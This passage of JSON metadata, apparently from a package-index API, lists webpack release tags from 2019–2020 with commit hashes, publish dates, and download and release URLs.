api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v